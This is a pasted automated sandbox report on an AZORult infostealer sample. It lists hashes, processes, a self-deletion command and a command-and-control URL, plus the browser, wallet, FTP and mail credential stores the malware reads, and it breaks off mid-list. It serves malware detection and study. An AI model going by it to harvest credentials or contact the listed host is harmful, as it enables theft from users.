API tools faq
paste
Advertisement
paladin316

Exes_a47488466980088aa1a6cb1ec3416907_exe_2019-08-16_10_30.txt

paladin316
Aug 16th, 2019
2,276
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 42.85 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * MalFamily: "AZORult"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_a47488466980088aa1a6cb1ec3416907.exe"
  7. * File Size: 4376576
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "5e768d552266d596c13ebeeede114300a9ae38ced6c885f3fad8d646cb1333d7"
  10. * MD5: "a47488466980088aa1a6cb1ec3416907"
  11. * SHA1: "ac8e97f51c621b2bee291745fcaf8b9c29aa2b92"
  12. * SHA512: "4e326e729b9f9ca474bd93da24d9f97b8439a7e60c01f7768069d3300bf791f9a451779983de94f1068e62ed68ca5f351d6815240448bf9459d6f569308d64c8"
  13. * CRC32: "D798E1D5"
  14. * SSDEEP: "98304:FEnVOD3k9R6QjpCxPGHPVOLapih7pLJYWWXPtf1W:1k9AK1tOO69LK1fY"
  15.  
  16. * Process Execution:
  17. "Exes_a47488466980088aa1a6cb1ec3416907.exe",
  18. "BHkd3kxjBDe.exe",
  19. "4koTr0CX1Je1Yp8mra3YBZ.exe",
  20. "4koTr0CX1Je1Yp8mra3YBZ.tmp",
  21. "Exes_a47488466980088aa1a6cb1ec3416907.exe",
  22. "cmd.exe",
  23. "timeout.exe",
  24. "services.exe",
  25. "lsass.exe",
  26. "taskhost.exe",
  27. "sc.exe",
  28. "svchost.exe",
  29. "svchost.exe",
  30. "WerFault.exe",
  31. "wermgr.exe"
  32.  
  33.  
  34. * Executed Commands:
  35. "C:\\Users\\user\\AppData\\Local\\Temp\\BHkd3kxjBDe.exe ",
  36. "C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe ",
  37. "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a47488466980088aa1a6cb1ec3416907.exe\"",
  38. "\"C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp\" /SL5=\"$12018E,3267609,58368,C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe\" /verysilent",
  39. "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"Exes_a47488466980088aa1a6cb1ec3416907.exe\"",
  40. "C:\\Windows\\system32\\lsass.exe",
  41. "taskhost.exe $(Arg0)",
  42. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  43. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  44. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  45. "C:\\Windows\\system32\\timeout.exe 3",
  46. "C:\\Windows\\system32\\WerFault.exe -u -p 2800 -s 288",
  47. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\""
  48.  
  49.  
  50. * Signatures Detected:
  51.  
  52. "Description": "At least one process apparently crashed during execution",
  53. "Details":
  54.  
  55.  
  56. "Description": "Creates RWX memory",
  57. "Details":
  58.  
  59.  
  60. "Description": "Reads data out of its own binary image",
  61. "Details":
  62.  
  63. "self_read": "process: 4koTr0CX1Je1Yp8mra3YBZ.exe, pid: 2480, offset: 0x0031dc19, length: 0x0000a4cf"
  64.  
  65.  
  66. "self_read": "process: 4koTr0CX1Je1Yp8mra3YBZ.exe, pid: 2480, offset: 0x003282a4, length: 0x0003b205"
  67.  
  68.  
  69. "self_read": "process: 4koTr0CX1Je1Yp8mra3YBZ.tmp, pid: 2648, offset: 0x00000000, length: 0x000afa00"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "A process created a hidden window",
  75. "Details":
  76.  
  77. "Process": "Exes_a47488466980088aa1a6cb1ec3416907.exe -> C:\\Windows\\System32\\cmd.exe"
  78.  
  79.  
  80.  
  81.  
  82. "Description": "Drops a binary and executes it",
  83. "Details":
  84.  
  85. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe"
  86.  
  87.  
  88. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\BHkd3kxjBDe.exe"
  89.  
  90.  
  91. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp"
  92.  
  93.  
  94.  
  95.  
  96. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  97. "Details":
  98.  
  99. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  100.  
  101.  
  102. "suspicious_request": "http://zdproject.best/index.php"
  103.  
  104.  
  105.  
  106.  
  107. "Description": "Performs some HTTP requests",
  108. "Details":
  109.  
  110. "url": "http://zdproject.best/index.php"
  111.  
  112.  
  113.  
  114.  
  115. "Description": "The binary likely contains encrypted or compressed data.",
  116. "Details":
  117.  
  118. "section": "name: .rsrc, entropy: 7.99, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00387a00, virtual_size: 0x00387950"
  119.  
  120.  
  121.  
  122.  
  123. "Description": "Executed a process and injected code into it, probably while unpacking",
  124. "Details":
  125.  
  126. "Injection": "Exes_a47488466980088aa1a6cb1ec3416907.exe(2736) -> Exes_a47488466980088aa1a6cb1ec3416907.exe(2060)"
  127.  
  128.  
  129.  
  130.  
  131. "Description": "Deletes its original binary from disk",
  132. "Details":
  133.  
  134.  
  135. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  136. "Details":
  137.  
  138. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11464360 times"
  139.  
  140.  
  141.  
  142.  
  143. "Description": "Steals private information from local Internet browsers",
  144. "Details":
  145.  
  146. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
  147.  
  148.  
  149. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
  150.  
  151.  
  152. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
  153.  
  154.  
  155. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
  156.  
  157.  
  158. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
  159.  
  160.  
  161. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
  162.  
  163.  
  164. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
  165.  
  166.  
  167. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
  168.  
  169.  
  170. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
  171.  
  172.  
  173. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
  174.  
  175.  
  176. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  177.  
  178.  
  179. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
  180.  
  181.  
  182. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
  183.  
  184.  
  185. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  186.  
  187.  
  188. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
  189.  
  190.  
  191. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  192.  
  193.  
  194. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
  195.  
  196.  
  197. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
  198.  
  199.  
  200. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  201.  
  202.  
  203. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
  204.  
  205.  
  206.  
  207.  
  208. "Description": "Collects information about installed applications",
  209. "Details":
  210.  
  211. "Program": "Google Update Helper"
  212.  
  213.  
  214.  
  215.  
  216. "Program": "Microsoft Excel MUI 2013"
  217.  
  218.  
  219. "Program": "Microsoft Outlook MUI 2013"
  220.  
  221.  
  222.  
  223.  
  224. "Program": "Google Chrome"
  225.  
  226.  
  227. "Program": "Adobe Flash Player 29 NPAPI"
  228.  
  229.  
  230. "Program": "Adobe Flash Player 29 ActiveX"
  231.  
  232.  
  233. "Program": "Microsoft Word MUI 2013"
  234.  
  235.  
  236. "Program": "Microsoft Access MUI 2013"
  237.  
  238.  
  239. "Program": "Microsoft Office Proofing Tools 2013 - English"
  240.  
  241.  
  242. "Program": "Adobe Acrobat Reader DC"
  243.  
  244.  
  245. "Program": "Microsoft Publisher MUI 2013"
  246.  
  247.  
  248. "Program": "Microsoft Office Shared MUI 2013"
  249.  
  250.  
  251. "Program": "Microsoft Office OSM MUI 2013"
  252.  
  253.  
  254. "Program": "Microsoft InfoPath MUI 2013"
  255.  
  256.  
  257. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  258.  
  259.  
  260. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  261.  
  262.  
  263. "Program": "Throttle"
  264.  
  265.  
  266. "Program": "Microsoft DCF MUI 2013"
  267.  
  268.  
  269. "Program": "Microsoft OneDrive"
  270.  
  271.  
  272. "Program": "Microsoft Groove MUI 2013"
  273.  
  274.  
  275. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  276.  
  277.  
  278.  
  279.  
  280. "Program": "Microsoft Access Setup Metadata MUI 2013"
  281.  
  282.  
  283. "Program": "Microsoft Office OSM UX MUI 2013"
  284.  
  285.  
  286. "Program": "Java Auto Updater"
  287.  
  288.  
  289. "Program": "Microsoft PowerPoint MUI 2013"
  290.  
  291.  
  292. "Program": "Microsoft Office Professional Plus 2013"
  293.  
  294.  
  295. "Program": "Adobe Refresh Manager"
  296.  
  297.  
  298. "Program": "Microsoft Office Proofing 2013"
  299.  
  300.  
  301. "Program": "Microsoft Lync MUI 2013"
  302.  
  303.  
  304.  
  305.  
  306. "Program": "Microsoft OneNote MUI 2013"
  307.  
  308.  
  309.  
  310.  
  311. "Description": "File has been identified by 25 Antiviruses on VirusTotal as malicious",
  312. "Details":
  313.  
  314. "FireEye": "Generic.mg.a47488466980088a"
  315.  
  316.  
  317. "McAfee": "Fareit-FPQ!A47488466980"
  318.  
  319.  
  320. "Cylance": "Unsafe"
  321.  
  322.  
  323. "Cybereason": "malicious.51c621"
  324.  
  325.  
  326. "TrendMicro": "TrojanSpy.Win32.LOKI.SMDD.hp"
  327.  
  328.  
  329. "Symantec": "ML.Attribute.HighConfidence"
  330.  
  331.  
  332. "APEX": "Malicious"
  333.  
  334.  
  335. "Avast": "Win32:Malware-gen"
  336.  
  337.  
  338. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  339.  
  340.  
  341. "Endgame": "malicious (high confidence)"
  342.  
  343.  
  344. "Sophos": "Mal/Fareit-V"
  345.  
  346.  
  347. "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.rc"
  348.  
  349.  
  350. "Trapmine": "malicious.high.ml.score"
  351.  
  352.  
  353. "Paloalto": "generic.ml"
  354.  
  355.  
  356. "Avira": "TR/AD.MoksSteal.dcot"
  357.  
  358.  
  359. "Microsoft": "Trojan:Win32/Conteban.B!ml"
  360.  
  361.  
  362. "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
  363.  
  364.  
  365. "Acronis": "suspicious"
  366.  
  367.  
  368. "ESET-NOD32": "a variant of Win32/Injector.EHEN"
  369.  
  370.  
  371. "TrendMicro-HouseCall": "TrojanSpy.Win32.LOKI.SMDD.hp"
  372.  
  373.  
  374. "Rising": "Trojan.IPLogger!1.B69D (CLASSIC)"
  375.  
  376.  
  377. "Fortinet": "W32/Injector.EGXE!tr"
  378.  
  379.  
  380. "Webroot": "W32.Malware.Gen"
  381.  
  382.  
  383. "AVG": "Win32:Malware-gen"
  384.  
  385.  
  386. "CrowdStrike": "win/malicious_confidence_60% (D)"
  387.  
  388.  
  389.  
  390.  
  391. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  392. "Details":
  393.  
  394.  
  395. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  396. "Details":
  397.  
  398.  
  399. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  400. "Details":
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
  403.  
  404.  
  405. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
  406.  
  407.  
  408. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
  409.  
  410.  
  411. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
  412.  
  413.  
  414. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
  415.  
  416.  
  417. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
  418.  
  419.  
  420. "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
  421.  
  422.  
  423. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
  424.  
  425.  
  426. "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
  430.  
  431.  
  432. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\wallet.dat"
  436.  
  437.  
  438. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
  439.  
  440.  
  441. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
  442.  
  443.  
  444. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
  445.  
  446.  
  447. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
  448.  
  449.  
  450. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  451.  
  452.  
  453.  
  454.  
  455. "Description": "Harvests credentials from local FTP client softwares",
  456. "Details":
  457.  
  458. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  459.  
  460.  
  461.  
  462.  
  463. "Description": "Harvests information related to installed instant messenger clients",
  464. "Details":
  465.  
  466. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  467.  
  468.  
  469.  
  470.  
  471. "Description": "Harvests information related to installed mail clients",
  472. "Details":
  473.  
  474. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  475.  
  476.  
  477. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  478.  
  479.  
  480. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  481.  
  482.  
  483. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  484.  
  485.  
  486. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  487.  
  488.  
  489. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  490.  
  491.  
  492. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  493.  
  494.  
  495. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  496.  
  497.  
  498. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  499.  
  500.  
  501. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  502.  
  503.  
  504. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  505.  
  506.  
  507. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  508.  
  509.  
  510. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  511.  
  512.  
  513. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  514.  
  515.  
  516. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  517.  
  518.  
  519. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  520.  
  521.  
  522. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  523.  
  524.  
  525. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  526.  
  527.  
  528. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  529.  
  530.  
  531. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  532.  
  533.  
  534. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  535.  
  536.  
  537.  
  538.  
  539. "Description": "Collects information to fingerprint the system",
  540. "Details":
  541.  
  542.  
  543. "Description": "Anomalous binary characteristics",
  544. "Details":
  545.  
  546. "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
  547.  
  548.  
  549.  
  550.  
  551. "Description": "Created network traffic indicative of malicious activity",
  552. "Details":
  553.  
  554. "signature": "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)"
  555.  
  556.  
  557.  
  558.  
  559.  
  560. * Started Service:
  561. "VaultSvc",
  562. "WerSvc",
  563. "W32Time"
  564.  
  565.  
  566. * Mutexes:
  567. "CicLoadWinStaWinSta0",
  568. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  569. "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
  570. "Local\\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511",
  571. "Local\\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000",
  572. "DefaultTabtip-MainUI",
  573. "Local\\WERReportingForProcess2800",
  574. "Global\\\\xe5\\x88\\x90\\xc2\\xa6",
  575. "Global\\\\xed\\x95\\xb0!",
  576. "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
  577.  
  578.  
  579. * Modified Files:
  580. "C:\\Users\\user\\AppData\\Local\\Temp\\BHkd3kxjBDe.exe",
  581. "C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe",
  582. "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp",
  583. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  584. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  585. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  586. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  587. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  588. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  589. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  590. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  591. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  592. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  593. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  594. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  595. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  596. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  597. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  598. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  599. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  600. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  601. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  602. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  603. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  604. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  605. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  606. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  607. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  608. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  609. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  610. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  611. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  612. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  613. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  614. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  615. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  616. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  617. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  618. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  619. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  620. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  621. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  622. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  623. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  624. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  625. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  626. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  627. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  628. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  629. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  630. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  631. "C:\\Users\\user\\AppData\\Local\\Temp\\86867814736212939668321.tmp",
  632. "C:\\Users\\user\\AppData\\Local\\Temp\\87383125507293532077856.tmp",
  633. "C:\\Users\\user\\AppData\\Local\\Temp\\8738375678859424949995.tmp",
  634. "C:\\Users\\user\\AppData\\Local\\Temp\\87384063080549063902971.tmp",
  635. "C:\\Users\\user\\AppData\\Local\\Temp\\87384533265966878166663.tmp",
  636. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  637. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_setup64.tmp",
  638. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_isdecmp.dll",
  639. "C:\\Program Files (x86)\\PGWARE\\Throttle\\Throttle.chm",
  640. "C:\\Program Files (x86)\\PGWARE\\Throttle\\Throttle.exe",
  641. "C:\\Program Files (x86)\\PGWARE\\Throttle\\ThrottleRegister.exe",
  642. "C:\\Program Files (x86)\\PGWARE\\Throttle\\ThrottleUpdate.exe",
  643. "C:\\Program Files (x86)\\PGWARE\\Throttle\\unins000.dat",
  644. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-8UKGJ.tmp",
  645. "C:\\Program Files (x86)\\PGWARE\\Throttle\\unins000.exe",
  646. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\is-FUI03.tmp",
  647. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\trees.bmp",
  648. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-D8VAV.tmp",
  649. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-EOBJF.tmp",
  650. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-080PA.tmp",
  651. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H79UP.tmp",
  652. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H8S3C.tmp",
  653. "C:\\Program Files (x86)\\PGWARE\\Throttle\\ReadMe.rtf",
  654. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-ARK8K.tmp",
  655. "C:\\Program Files (x86)\\PGWARE\\Throttle\\License.rtf",
  656. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-P68A4.tmp",
  657. "C:\\Program Files (x86)\\PGWARE\\Throttle\\uninsimg.dat",
  658. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-VASLS.tmp",
  659. "C:\\Program Files (x86)\\PGWARE\\Throttle\\History.rtf",
  660. "\\??\\PIPE\\srvsvc",
  661. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.lnk",
  662. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.url",
  663. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.lnk",
  664. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  665. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
